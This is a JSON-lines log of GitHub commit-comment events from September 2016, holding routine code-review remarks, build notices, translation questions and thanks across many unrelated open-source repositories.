{"id":"4609417953","type":"CommitCommentEvent","actor":{"login":"hklcf"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19148707,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-23T16:01:08Z","updated_at":"2016-09-23T16:01:08Z","body":"@popolihu123 舊方法已失效，我只能說現在要先取得session\r\n\r\n![image](https://cloud.githubusercontent.com/assets/410302/18792664/fa1167f2-81e9-11e6-9cc1-9cee7752ea2e.png)\r\n"}},"created_at":"2016-09-23T16:01:08Z"}
{"id":"4609418508","type":"CommitCommentEvent","actor":{"login":"gtrufitt"},"repo":{"name":"sindresorhus/grunt-svgmin"},"payload":{"comment":{"id":19148710,"position":null,"line":null,"path":null,"commit_id":"443f1869ff4c822ec80b0a6ced4e9aca11a134ef","created_at":"2016-09-23T16:01:12Z","updated_at":"2016-09-23T16:01:12Z","body":"👏 👍 "}},"created_at":"2016-09-23T16:01:12Z"}
{"id":"4609418700","type":"CommitCommentEvent","actor":{"login":"jjab2020"},"repo":{"name":"nayrnet/node-hikvision-api"},"payload":{"comment":{"id":19148711,"position":null,"line":null,"path":null,"commit_id":"cc163c403b94cd83a19a8809fdd4b9c10c4df1d1","created_at":"2016-09-23T16:01:14Z","updated_at":"2016-09-23T16:01:14Z","body":"hello,\r\nI would like to thank you for this great library is very useful for me , but how can i include this library to test it if it doesn't exist in npm package.\r\nSecond question is about streaming live camera hikvision function in this api\r\n\r\nHave a good day \r\n"}},"created_at":"2016-09-23T16:01:14Z"}
{"id":"4609419209","type":"CommitCommentEvent","actor":{"login":"jaaf"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19148713,"position":1,"line":1,"path":"docs/guide-fr/db-active-record.md","commit_id":"181e66b8601c70d55177c7d4f0be8599dc63bfc2","created_at":"2016-09-23T16:01:17Z","updated_at":"2016-09-23T16:01:17Z","body":"Hi, thank you for your comment\r\nI understand your point. I think I avoided writing things like : \r\n`class Customer extends EnregistrementActif ` but I may have made some mistakes in places. \r\nFor titles, I hesitated a bit as the title itself doesn't directly refer to the class (Active Record is not the name of the class, the class name is ActiveRecord) but to the concept behind it. But I can admit that keeping a reference to the name of the class in translation could make things easier to follow for learners. It could be either \r\n\r\n> Enregistrement actif (class ActiveRecord) \r\n\r\nor\r\n\r\n>  Active Record (Enregistrement actif) \r\n\r\nPersonally, I would prefer the former, but if there is a rule to be respected in Yii community, tell me. \r\n\r\nAfter that, I will have a look back at my previous translations with this in mind."}},"created_at":"2016-09-23T16:01:17Z"}
{"id":"4609420183","type":"CommitCommentEvent","actor":{"login":"romeof1980"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19148716,"position":null,"line":null,"path":null,"commit_id":"23103c03c527fe1ed3e1a3be691436818b7963fe","created_at":"2016-09-23T16:01:28Z","updated_at":"2016-09-23T16:01:28Z","body":"hi there,\n\n\"I tried that already and no good\" -&gt; I have no means to check if you did it correctly:\n\n\n\nplease explain in detail what you did and attach the screenshots (of the created folders and of the \"hover\" on logo)\n\n\n\ncheers!\n\n\n\n\n\n---- On Fri, 23 Sep 2016 17:58:50 +0200jpcsguru &lt;notifications@github.com&gt; wrote ----\n\n\n\n\nhi,\n\n I tried that already and no good\n\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n\n\n\n\n\n\n\n"}},"created_at":"2016-09-23T16:01:28Z"}
{"id":"4609421074","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19148719,"position":null,"line":null,"path":null,"commit_id":"39f5831f0f518df07418758127db42b173b1804c","created_at":"2016-09-23T16:01:36Z","updated_at":"2016-09-23T16:01:36Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1156](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14203&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 252, ignored: 3 Build time: 00:11:01"}},"created_at":"2016-09-23T16:01:36Z"}
{"id":"4609428109","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"MSF-Jarvis/KPSConnect"},"payload":{"comment":{"id":19148734,"position":null,"line":null,"path":null,"commit_id":"7883a3c1ebbc4c7c212d7d6db78029f62f0e61da","created_at":"2016-09-23T16:02:49Z","updated_at":"2016-09-23T16:02:49Z","body":"lol I'm not saying that you are :joy:"}},"created_at":"2016-09-23T16:02:49Z"}
{"id":"4609433428","type":"CommitCommentEvent","actor":{"login":"rafaelcp"},"repo":{"name":"rafaelcp/Open-Mega-Engine"},"payload":{"comment":{"id":19148752,"position":null,"line":null,"path":null,"commit_id":"050fd07fa93e980098072f1fb95f73edffb8226d","created_at":"2016-09-23T16:03:47Z","updated_at":"2016-09-23T16:03:47Z","body":"Additionally, it is not necessary to set the totalWeapons and weapons_per_col anymore, everything is automatic."}},"created_at":"2016-09-23T16:03:47Z"}
{"id":"4609434683","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19148756,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-23T16:04:02Z","updated_at":"2016-09-23T16:04:02Z","body":"能不能私聊 大神"}},"created_at":"2016-09-23T16:04:02Z"}
{"id":"4609435595","type":"CommitCommentEvent","actor":{"login":"18AdrianoH"},"repo":{"name":"HarkerGameDevelopmentClub/TheGame1617"},"payload":{"comment":{"id":19148759,"position":null,"line":null,"path":null,"commit_id":"ce8ab6354ba01592f3e3545fd5b0b14d339193d9","created_at":"2016-09-23T16:04:13Z","updated_at":"2016-09-23T16:04:13Z","body":"It would make more sense for game to extend application, then you put main function inside game.  If you wanna do it this way you can too though."}},"created_at":"2016-09-23T16:04:13Z"}
{"id":"4609439662","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"MSF-Jarvis/KPSConnect"},"payload":{"comment":{"id":19148771,"position":null,"line":null,"path":null,"commit_id":"7883a3c1ebbc4c7c212d7d6db78029f62f0e61da","created_at":"2016-09-23T16:05:01Z","updated_at":"2016-09-23T16:05:01Z","body":"Man I even gave someone authorship on a commit that added like, 4 brackets\nto a $(shell ) invocation cuz he had both of those lines done right. I go\noverboard with this shit sometimes\n\nOn Fri, Sep 23, 2016, 9:32 PM Simao Gomes Viana <notifications@github.com>\nwrote:\n\n> lol I'm not saying that you are 😂\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MSF-Jarvis/KPSConnect/commit/7883a3c1ebbc4c7c212d7d6db78029f62f0e61da#commitcomment-19148734>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMuuGt6CMayWYwC88PARTEV-cfYtGFFWks5qs_gpgaJpZM4KFEcu>\n> .\n>\n"}},"created_at":"2016-09-23T16:05:01Z"}
{"id":"4609443412","type":"CommitCommentEvent","actor":{"login":"dsuare1"},"repo":{"name":"dsuare1/the_round_about"},"payload":{"comment":{"id":19148780,"position":null,"line":null,"path":null,"commit_id":"f119460b95c2ab324321fc1a737b4dd47190065f","created_at":"2016-09-23T16:05:44Z","updated_at":"2016-09-23T16:05:44Z","body":"-removed a lot of unused dependencies (bcryptjs, connect-flash, expressValidator, express-sessions, passport); may go back and implement some later if time permits\r\n-updated 'tra-api-controller.js' to accept POST for creating users (there will be only two users: webmaster and owners' account)"}},"created_at":"2016-09-23T16:05:44Z"}
{"id":"4609447770","type":"CommitCommentEvent","actor":{"login":"dagochen"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":19148797,"position":null,"line":null,"path":null,"commit_id":"c1aad1894933199245ce4b45fce62093196947fd","created_at":"2016-09-23T16:06:26Z","updated_at":"2016-09-23T16:06:26Z","body":"Ah thx. Didn't know that ;)"}},"created_at":"2016-09-23T16:06:26Z"}
{"id":"4609450645","type":"CommitCommentEvent","actor":{"login":"rwinch"},"repo":{"name":"rwinch/spring-framework"},"payload":{"comment":{"id":19148807,"position":5,"line":30,"path":"spring-test/src/test/java/org/springframework/test/web/MockHttpTests.java","commit_id":"be3f8c7f9e71c6fb6c65143c88925b79e8dddc78","created_at":"2016-09-23T16:06:59Z","updated_at":"2016-09-23T16:06:59Z","body":"Thanks Rossen. I think this commit needs to be ignored. I accidentally pushed it and it should have been deleted"}},"created_at":"2016-09-23T16:06:59Z"}
{"id":"4609450846","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19148808,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-23T16:07:01Z","updated_at":"2016-09-23T16:07:01Z","body":"QQ88400882 我愿意花钱"}},"created_at":"2016-09-23T16:07:01Z"}
{"id":"4609451297","type":"CommitCommentEvent","actor":{"login":"rustyswayne"},"repo":{"name":"Merchello/Merchello"},"payload":{"comment":{"id":19148811,"position":null,"line":null,"path":null,"commit_id":"3a0e91ed36085aee368f85567ba983a2e3adb867","created_at":"2016-09-23T16:07:06Z","updated_at":"2016-09-23T16:07:06Z","body":"@williamzh Thanks for this.\r\n\r\nThanks for this.  Can you write up an issue in http://issues.merchello.org and reference this pull request so I can associate it with a task.\r\n\r\nNice work on finding the dateHelper.service.js file in the Merchello.Web.UI.Client project.  Lots of people miss editing the actual source file and go straight to the combined source =)"}},"created_at":"2016-09-23T16:07:06Z"}
{"id":"4609451551","type":"CommitCommentEvent","actor":{"login":"eweshi"},"repo":{"name":"kswain1/IntelEdison"},"payload":{"comment":{"id":19148814,"position":null,"line":null,"path":null,"commit_id":"f4bfd889dbeb8d4dba07745e0996e7302d721d2d","created_at":"2016-09-23T16:07:09Z","updated_at":"2016-09-23T16:07:09Z","body":"Follow the math. You can experiment and try it without those constants to see what you will get.\r\n\r\nOn Sep 23, 2016 1:11 AM, Kehlin Swain <notifications@github.com> wrote:\r\n\r\nhow does this make things more accurate?\r\n\r\n—\r\nYou are receiving this because you are subscribed to this thread.\r\nReply to this email directly, view it on GitHub<https://github.com/kswain1/IntelEdison/commit/f4bfd889dbeb8d4dba07745e0996e7302d721d2d#commitcomment-19142530>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AD37F2x6kaQ78d3UaGcwNa7V_kqAlxXtks5qs4mkgaJpZM4KEt2W>.\r\n\r\n"}},"created_at":"2016-09-23T16:07:09Z"}
{"id":"4609457909","type":"CommitCommentEvent","actor":{"login":"brianchandotcom"},"repo":{"name":"brianchandotcom/liferay-portal"},"payload":{"comment":{"id":19148829,"position":null,"line":null,"path":null,"commit_id":"eb629472d7c8d4c5a286897a75efd3f52d27f0b5","created_at":"2016-09-23T16:08:20Z","updated_at":"2016-09-23T16:08:20Z","body":"@sergiogonzalez you are right. My bad!"}},"created_at":"2016-09-23T16:08:20Z"}
{"id":"4609458246","type":"CommitCommentEvent","actor":{"login":"sofe-web-project"},"repo":{"name":"sofe-web-project/html-css-draft"},"payload":{"comment":{"id":19148831,"position":null,"line":null,"path":null,"commit_id":"d44ef43ab85b1a87b4f3f930cf1433cac421dbdc","created_at":"2016-09-23T16:08:25Z","updated_at":"2016-09-23T16:08:25Z","body":"draft css - Anna"}},"created_at":"2016-09-23T16:08:25Z"}
{"id":"4609461389","type":"CommitCommentEvent","actor":{"login":"marek-safar"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19148839,"position":1,"line":1,"path":"mcs/class/corlib/net_4_x_corlib.dll.sources","commit_id":"112631f5c6926eb00544cd39f6be7a98983503b8","created_at":"2016-09-23T16:08:59Z","updated_at":"2016-09-23T16:08:59Z","body":"We can kill this file"}},"created_at":"2016-09-23T16:08:59Z"}
{"id":"4609466643","type":"CommitCommentEvent","actor":{"login":"Catzenjaeger"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19148850,"position":null,"line":null,"path":null,"commit_id":"ad8e28c8cf2b447b726896e27f77596e9e4d3aeb","created_at":"2016-09-23T16:09:59Z","updated_at":"2016-09-23T16:09:59Z","body":"db_user table --> no column user_theme \r\n**what now?** why i miss often some columns? You add every day columns? "}},"created_at":"2016-09-23T16:09:59Z"}
{"id":"4609466997","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19148852,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-23T16:10:03Z","updated_at":"2016-09-23T16:10:03Z","body":"菜鸟一个"}},"created_at":"2016-09-23T16:10:03Z"}
{"id":"4609469445","type":"CommitCommentEvent","actor":{"login":"nuclearc"},"repo":{"name":"woegster/easywsclient"},"payload":{"comment":{"id":19148860,"position":null,"line":null,"path":null,"commit_id":"7605811712878ef43355d360c3167f8f283fc278","created_at":"2016-09-23T16:10:29Z","updated_at":"2016-09-23T16:10:29Z","body":"How can we add SOCKS5 proxy support?"}},"created_at":"2016-09-23T16:10:29Z"}
{"id":"4609470008","type":"CommitCommentEvent","actor":{"login":"marek-safar"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19148861,"position":4,"line":148,"path":"mcs/class/System/System.Net/HttpWebRequest.cs","commit_id":"112631f5c6926eb00544cd39f6be7a98983503b8","created_at":"2016-09-23T16:10:35Z","updated_at":"2016-09-23T16:10:35Z","body":"Should be #if !MOBILE"}},"created_at":"2016-09-23T16:10:35Z"}
{"id":"4609470940","type":"CommitCommentEvent","actor":{"login":"18PatZ"},"repo":{"name":"HarkerGameDevelopmentClub/TheGame1617"},"payload":{"comment":{"id":19148864,"position":null,"line":null,"path":null,"commit_id":"ce8ab6354ba01592f3e3545fd5b0b14d339193d9","created_at":"2016-09-23T16:10:46Z","updated_at":"2016-09-23T16:10:46Z","body":"It makes more sense for Main to handle the main stuff and Game to handle the game stuff"}},"created_at":"2016-09-23T16:10:46Z"}
{"id":"4609472880","type":"CommitCommentEvent","actor":{"login":"dnwe"},"repo":{"name":"mbroadst/amqp10-link-cache"},"payload":{"comment":{"id":19148869,"position":null,"line":null,"path":null,"commit_id":"65ba3cda2f045e794c3b0d53ae3fcc8e8bf09d00","created_at":"2016-09-23T16:11:09Z","updated_at":"2016-09-23T16:11:09Z","body":"👍🏻"}},"created_at":"2016-09-23T16:11:09Z"}
{"id":"4609473249","type":"CommitCommentEvent","actor":{"login":"akoeplinger"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19148870,"position":1,"line":1,"path":"mcs/class/corlib/net_4_x_corlib.dll.sources","commit_id":"112631f5c6926eb00544cd39f6be7a98983503b8","created_at":"2016-09-23T16:11:12Z","updated_at":"2016-09-23T16:11:12Z","body":"Not sure I understand, you mean killing net_4_x_corlib.dll.sources or corlib.dll.sources?"}},"created_at":"2016-09-23T16:11:12Z"}
{"id":"4609474965","type":"CommitCommentEvent","actor":{"login":"midenok"},"repo":{"name":"natsys/mariadb_10.2"},"payload":{"comment":{"id":19148874,"position":null,"line":null,"path":null,"commit_id":"e0ef1e342c44bfd1adbe897f024f495451189586","created_at":"2016-09-23T16:11:33Z","updated_at":"2016-09-23T16:11:33Z","body":"Was there no warning before?"}},"created_at":"2016-09-23T16:11:33Z"}
{"id":"4609479948","type":"CommitCommentEvent","actor":{"login":"jarias"},"repo":{"name":"stormpath/stormpath-sdk-java"},"payload":{"comment":{"id":19148890,"position":18,"line":7,"path":"ci/junit-errors-to-stdout.sh","commit_id":"771632d254b7ece3be8fe03ec7358522d2636725","created_at":"2016-09-23T16:12:28Z","updated_at":"2016-09-23T16:12:28Z","body":"@dogeared this won't work, cause travis would cut the log probably before the failure :( is better to do a tails -n 200, but I think the issue is that our test tenant had a lot of applications and that causes one of the ITs that start a spring context to fail"}},"created_at":"2016-09-23T16:12:28Z"}
{"id":"4609483925","type":"CommitCommentEvent","actor":{"login":"vrutkovs"},"repo":{"name":"lkolacek/dockpulp"},"payload":{"comment":{"id":19148901,"position":10,"line":10,"path":".travis.yml","commit_id":"032b3f0947576ca5fefe658a9431b680cff78cc1","created_at":"2016-09-23T16:13:14Z","updated_at":"2016-09-23T16:13:14Z","body":"That's not a good idea - we also want to test PRs, so we should check if the checked out code is installable instead of installing latest code from master\r\n\r\nSuggestion: run 'python setup.py install' here"}},"created_at":"2016-09-23T16:13:14Z"}
{"id":"4609484987","type":"CommitCommentEvent","actor":{"login":"flavour"},"repo":{"name":"sahana/eden"},"payload":{"comment":{"id":19148906,"position":5,"line":1042,"path":"modules/s3/s3resource.py","commit_id":"3adc2fb21df191adcaab8a076cbf89f08a5c0876","created_at":"2016-09-23T16:13:27Z","updated_at":"2016-09-23T16:13:27Z","body":"On 23 September 2016 at 16:15, Dominic König <notifications@github.com>\nwrote:\n\n> Why always so much negativity whenever I raise an objection?\n>\n\nHardly! I just object when it seems wrong to me...I had considered the\noption you suggested & it didn't make sense to me, for the reasons I gave.\nWhy I can't do that without you accusing me of negativity seems the issue\nto me ;)\n\nAnyway:\n\n\n> The only reason for anonymous approval is automatic approval - there is\n> really no point in exposing approval in the UI for users who aren't logged\n> in (seriously: this is bare nonsense).\n>\n\nI disagree...the usecases may be beyond the ones we're focussed on where\nauthentication is important for approval...however it isn't terribly\nrelevant here anyway as the argument still remains for me either way.\n\n\n> Controlling the user ID for approval was meant to happen via\n> login/s3_impersonate, because that's the only way to actually check\n> permissions for the particular record (realms!). Hence, enforcing that\n> seems like a good idea - which is why this used to fall back to None.\n>\n\nWe don't want to simply use s3_impersonate as we don't want to switch IDs\nin other flows.\nWe /could/ store the current user_id (if available) s3_impersonate to the\nverifying user & then s3_impersonate back again (if there was such a user).\nThis all seems very clumsy though when a simple auth.override does the job\n(we don't really need to store the fact that it was this user who approved\nthemselves)\n\n\n> Obviously, automatic back-end approval requires an override - but you can\n> not simply /assume/ that any anonymous call is always a back-end call.\n> There needs to be an indicator, and auth.override seems like the obvious\n> one.\n>\n\nThis function doesn't check permissions at all...I don't see any need to\nhave it know about back-end vs front=-end if this is indeed\nmenaingful...it's just an API call which could have either case & the\ncaller is responsible that this is authorised.\n\n\n> But I think, that's not actually what we both want - the only real \"fix\"\n> will be to add user_id to the parameter list of approve(), so that you can\n> indeed override the approver explicitly, as that is what you want.\n>\n> This works for me:\n>\n> def approve(self, components=[], approve=True, approved_by=None):\n>\n>     auth = current.auth\n>     if approve:\n>         if approved_by is None:\n>             user = auth.user\n>             if user:\n>                 user_id = user.id\n>             else:\n>                 return False\n>         else:\n>             user_id = approved_by\n>     else:\n>         # Reset to unapproved\n>         user_id = None\n>\n>\nThis still won't work with auth.override though...it requires us to use\ns3_impersonate instead...potentially twice...a lot more overhead for no\nreal gain.\n\nNote that this removes the s3_logged_in, because I agree it is up to the\n> caller to trigger the auth challenge, not so low-level.\n>\nAt least ;)\n\nF\n"}},"created_at":"2016-09-23T16:13:27Z"}
{"id":"4609485244","type":"CommitCommentEvent","actor":{"login":"akoeplinger"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19148907,"position":4,"line":148,"path":"mcs/class/System/System.Net/HttpWebRequest.cs","commit_id":"112631f5c6926eb00544cd39f6be7a98983503b8","created_at":"2016-09-23T16:13:30Z","updated_at":"2016-09-23T16:13:30Z","body":"Hmm good point. I guess we could remove these `[Obsolete]` additions again since Wes removed them from the standard, the addition was in an earlier commit that I overlooked when squashing. Any preference?"}},"created_at":"2016-09-23T16:13:30Z"}
{"id":"4609486095","type":"CommitCommentEvent","actor":{"login":"esorio"},"repo":{"name":"cstefanache/angular2-img-cropper"},"payload":{"comment":{"id":19148913,"position":null,"line":null,"path":null,"commit_id":"d9d33299b90c74c55d051eecfe52ef8d240c0c82","created_at":"2016-09-23T16:13:42Z","updated_at":"2016-09-23T16:13:42Z","body":"ok! thanks :+1: "}},"created_at":"2016-09-23T16:13:42Z"}
{"id":"4609486178","type":"CommitCommentEvent","actor":{"login":"nominalaeon"},"repo":{"name":"jcjmcclean/guides"},"payload":{"comment":{"id":19148914,"position":null,"line":null,"path":null,"commit_id":"398fb0a06bb61745ee2131a0513c26da1eba4a0e","created_at":"2016-09-23T16:13:42Z","updated_at":"2016-09-23T16:13:42Z","body":"hahah that's awesome, it's the first time anyone's forked me as well. I'll\njump over and check it out, I'm sure it's badass. Thanks for the\ncontribution, man!\n\nOn Fri, Sep 23, 2016 at 10:35 AM, James McClean <notifications@github.com>\nwrote:\n\n> Hey Noah,\n>\n> First time I've forked and edited someone else's project on github! It took\n> me 3 separate branches and about 6 commits to figure out what I was doing.\n> I ended up forking again from scratch once I'd worked it out. Hopefully the\n> pull request is ok :-)\n>\n> I left out the blurb started for now, just wanted to add in the quick\n> suggestions I had.\n>\n> Cheers,\n>\n> James\n>\n> On Fri, Sep 23, 2016 at 3:39 PM, Noah Rodenbeek <notifications@github.com>\n> wrote:\n>\n> > Can't wait for the PR, sir, thank you for the assist!\n> >\n> > —\n> > You are receiving this because you are subscribed to this thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/jcjmcclean/guides/commit/\n> 398fb0a06bb61745ee2131a0513c26da1eba4a0e#commitcomment-19147232>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> ABvPbjwUEC2OqTs0DuPlwrMOvmt4_Aegks5qs-SagaJpZM4KFDMY>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jcjmcclean/guides/commit/398fb0a06bb61745ee2131a0513c26da1eba4a0e#commitcomment-19148287>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABDxxcfOx1gcAZ1gnCoJmUg8w6LMFgHbks5qs_GwgaJpZM4KFDMY>\n> .\n>\n"}},"created_at":"2016-09-23T16:13:42Z"}
{"id":"4609487767","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19148917,"position":6,"line":21,"path":"libselinux/src/callbacks.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T16:14:02Z","updated_at":"2016-09-23T16:14:02Z","body":"Do you have any suggestions better than host, i read HOST as HACK...\r\n\r\nHOST_NO_SELINUX"}},"created_at":"2016-09-23T16:14:02Z"}
{"id":"4609491107","type":"CommitCommentEvent","actor":{"login":"rzara"},"repo":{"name":"lutece-platform/lutece-core"},"payload":{"comment":{"id":19148927,"position":12,"line":429,"path":"src/java/fr/paris/lutece/portal/business/user/AdminUser.java","commit_id":"c9e3f4f82cb631bc499dddafd17bcc776c115aae","created_at":"2016-09-23T16:14:41Z","updated_at":"2016-09-23T16:14:41Z","body":"Map<K, V>#replace is Java 1.8 only. Is this intentional ?\r\nIf so, this new dependency should be stated in the global POM.\r\ncc @jonenst "}},"created_at":"2016-09-23T16:14:41Z"}
{"id":"4609493797","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19148931,"position":47,"line":96,"path":"libselinux/src/label.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T16:15:13Z","updated_at":"2016-09-23T16:15:13Z","body":"This is it, the only place... Ill switch it to fgets()"}},"created_at":"2016-09-23T16:15:13Z"}
{"id":"4609495221","type":"CommitCommentEvent","actor":{"login":"MrTektoniK"},"repo":{"name":"MrTektoniK/TektoniK"},"payload":{"comment":{"id":19148933,"position":141,"line":141,"path":"MiniRPG/Program.cs","commit_id":"768ddb9f5bc860ff19d7b6d4de2034edac9acbc2","created_at":"2016-09-23T16:15:28Z","updated_at":"2016-09-23T16:15:28Z","body":"//сбор команды"}},"created_at":"2016-09-23T16:15:28Z"}
{"id":"4609497365","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"openatx/facebook-wda"},"payload":{"comment":{"id":19148936,"position":3,"line":120,"path":"wda/__init__.py","commit_id":"d67add6f10ee7c3161cfdd0e86512454d00d6855","created_at":"2016-09-23T16:15:53Z","updated_at":"2016-09-23T16:15:53Z","body":"\n        \n            是的，正所谓优化永不止境发自网易邮箱大师\n            在2016年09月23日 22:56，Diaojunxian 写道:看了你和他的对话，是为了节省应用启动的什么时间吗？\n\n—You are receiving this because you authored the thread.Reply to this email directly, view it on GitHub, or mute the thread.\n\n\n  \n  \n\n\n\n\n{\"api_version\":\"1.0\",\"publisher\":{\"api_key\":\"05dde50f1d1a384dd78767c55493e4bb\",\"name\":\"GitHub\"},\"entity\":{\"external_key\":\"github/openatx/facebook-wda\",\"title\":\"openatx/facebook-wda\",\"subtitle\":\"GitHub repository\",\"main_image_url\":\"https://cloud.githubusercontent.com/assets/143418/17495839/a5054eac-5d88-11e6-95fc-7290892c7bb5.png\",\"avatar_image_url\":\"https://cloud.githubusercontent.com/assets/143418/15842166/7c72db34-2c0b-11e6-9aed-b52498112777.png\",\"action\":{\"name\":\"Open in GitHub\",\"url\":\"https://github.com/openatx/facebook-wda\"}},\"updates\":{\"snippets\":[{\"icon\":\"PERSON\",\"message\":\"@diaojunxian on d67add6: 看了你和他的对话，是为了节省应用启动的什么时间吗？\"}],\"action\":{\"name\":\"View Commit\",\"url\":\"https://github.com/openatx/facebook-wda/commit/d67add6f10ee7c3161cfdd0e86512454d00d6855#commitcomment-19147505\"}}}"}},"created_at":"2016-09-23T16:15:53Z"}
{"id":"4609501665","type":"CommitCommentEvent","actor":{"login":"marek-safar"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19148949,"position":1,"line":1,"path":"mcs/class/corlib/net_4_x_corlib.dll.sources","commit_id":"112631f5c6926eb00544cd39f6be7a98983503b8","created_at":"2016-09-23T16:16:43Z","updated_at":"2016-09-23T16:16:43Z","body":"I meant net_4_x_corlib.dll.sources"}},"created_at":"2016-09-23T16:16:43Z"}
{"id":"4609503515","type":"CommitCommentEvent","actor":{"login":"fbricon"},"repo":{"name":"gorkem/vscode-java"},"payload":{"comment":{"id":19148961,"position":null,"line":null,"path":null,"commit_id":"395d61bf25eccc5a505bccf1c1b70d3066503206","created_at":"2016-09-23T16:17:07Z","updated_at":"2016-09-23T16:17:07Z","body":"The get open jdk link should actually point to oracle jdk when running on macos"}},"created_at":"2016-09-23T16:17:07Z"}
{"id":"4609505310","type":"CommitCommentEvent","actor":{"login":"Gamecube762"},"repo":{"name":"Gamecube762/TextToBlock"},"payload":{"comment":{"id":19148964,"position":129,"line":129,"path":"src/main/java/com/github/gamecube762/texttoblock/SpongeLoader.java","commit_id":"eb3b34fa6ffb13ea43ad333683f1027fdf0e4c0a","created_at":"2016-09-23T16:17:27Z","updated_at":"2016-09-23T16:17:27Z","body":"Thank you for the code review and all the feedback! I've made changes based on your suggestions for all but the Command and Config stuff. The commands were \"Just get it working for now\" and wont be final, but I will look into custom CommandElements and I found Collectors.join(...) works perfectly (wouldn't have found it without your suggestion). As for the config, this just makes it easier for adding new nodes to current configs; once the config is more final, I may switch to storing the default config in the jar."}},"created_at":"2016-09-23T16:17:27Z"}
{"id":"4609507164","type":"CommitCommentEvent","actor":{"login":"odinserj"},"repo":{"name":"HangfireIO/Hangfire"},"payload":{"comment":{"id":19148972,"position":5,"line":244,"path":"src/Hangfire.Core/ContinuationsSupportAttribute.cs","commit_id":"5ee1ef8bc13dcff44f7077171288575fdf941fb8","created_at":"2016-09-23T16:17:49Z","updated_at":"2016-09-23T16:17:49Z","body":"I was thinking that internal modifier will prevent users from deserializing continuations. However it's better to provide another API for this on-demand. I'll switch it to internal."}},"created_at":"2016-09-23T16:17:49Z"}
{"id":"4609507998","type":"CommitCommentEvent","actor":{"login":"davidh-ssec"},"repo":{"name":"pyinstaller/pyinstaller"},"payload":{"comment":{"id":19148974,"position":null,"line":null,"path":null,"commit_id":"fd3df7796afa367e511c881dac983cad0697b9a3","created_at":"2016-09-23T16:18:00Z","updated_at":"2016-09-23T16:18:00Z","body":"What version of glibc were these bootloaders compiled with? It is now asking for GLIBC 2.14 which is not available in CentOS/RHEL 6."}},"created_at":"2016-09-23T16:18:00Z"}
{"id":"4609509084","type":"CommitCommentEvent","actor":{"login":"cbfinn"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19148976,"position":7,"line":69,"path":"experiments/mjc_mdgps_ioc_example/hyperparams.py","commit_id":"3775709a0c496dd31b1c075e6e77289f124eb554","created_at":"2016-09-23T16:18:13Z","updated_at":"2016-09-23T16:18:13Z","body":"maybe put these in hyperparams_compare if they aren't used in the other variants?"}},"created_at":"2016-09-23T16:18:13Z"}
{"id":"4609518120","type":"CommitCommentEvent","actor":{"login":"rstoyanchev"},"repo":{"name":"rwinch/spring-framework"},"payload":{"comment":{"id":19148994,"position":5,"line":30,"path":"spring-test/src/test/java/org/springframework/test/web/MockHttpTests.java","commit_id":"be3f8c7f9e71c6fb6c65143c88925b79e8dddc78","created_at":"2016-09-23T16:20:01Z","updated_at":"2016-09-23T16:20:01Z","body":"Okay I actually came here to see what you did about the MockHttpServletRequestBuilder which depends on FlashMap-related imports but I can imagine the approach consistent with the rest of the changes here would be a base class."}},"created_at":"2016-09-23T16:20:01Z"}
{"id":"4609518936","type":"CommitCommentEvent","actor":{"login":"cbfinn"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19149000,"position":90,"line":208,"path":"python/gps/utility/generate_demo.py","commit_id":"3775709a0c496dd31b1c075e6e77289f124eb554","created_at":"2016-09-23T16:20:11Z","updated_at":"2016-09-23T16:20:11Z","body":"remove commented out code here?"}},"created_at":"2016-09-23T16:20:11Z"}
